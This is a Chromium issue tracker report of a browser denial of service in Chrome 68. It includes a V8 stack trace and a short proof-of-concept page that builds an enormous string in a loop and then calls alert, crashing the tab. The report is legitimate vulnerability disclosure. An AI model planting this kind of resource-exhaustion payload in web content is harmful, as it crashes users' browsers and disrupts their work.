Issue metadata
Sign in to add a comment
|
Denial Of Service
Reported by
mishra.d...@gmail.com,
Sep 7
|
||||||||||||||||||
Issue descriptionUserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Steps to reproduce the problem: Product affected: OS Linux Chromium 68.0.3440.106 (Official Build) (64-bit) Revision 1c32c539ce0065a41cb79da7bfcd2c71af1afe62-refs/branch-heads/3440@{#794} JavaScript V8 6.8.275.26 Steps to reproduce: 1. Open poc.html 2. Wait for a while 3. You see snap page! In debug mode the below JS stack was generated. <--- JS stacktrace ---> ==== JS stack trace ========================================= 0: ExitFrame [pc: 0x3560c1f5c33d] 1: StubFrame [pc: 0x3560c1f5d6ff] Security context: 0x09f3d4907499 <Window map = 0xff155b02259> 2: /* anonymous */ [0x9f3d497ebe1] [file:///home/input0/Desktop/1.html:~3] [pc=0x3560c1fc96b4](this=0x1cb6add07f51 <JSGlobal Object>) 3: InternalFrame [pc: 0x3560c1f0eed5] 4: EntryFrame [pc: 0x3560c1f059a1] ==== Details ================================================ [0]: ExitFrame [pc: 0... What is the expected behavior? What went wrong? poc.html <script> var a = ''; for (var i = 1; i <= 500000000000; i++) { a += '\n'; } alert(a); </script> Did this work before? No Chrome version: 68.0.3440.106 (Official Build) (64-bit) Channel: n/a OS Version: Flash Version: Shockwave Flash 30.0 r0
,
Dec 15
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by mpdenton@google.com
, Sep 7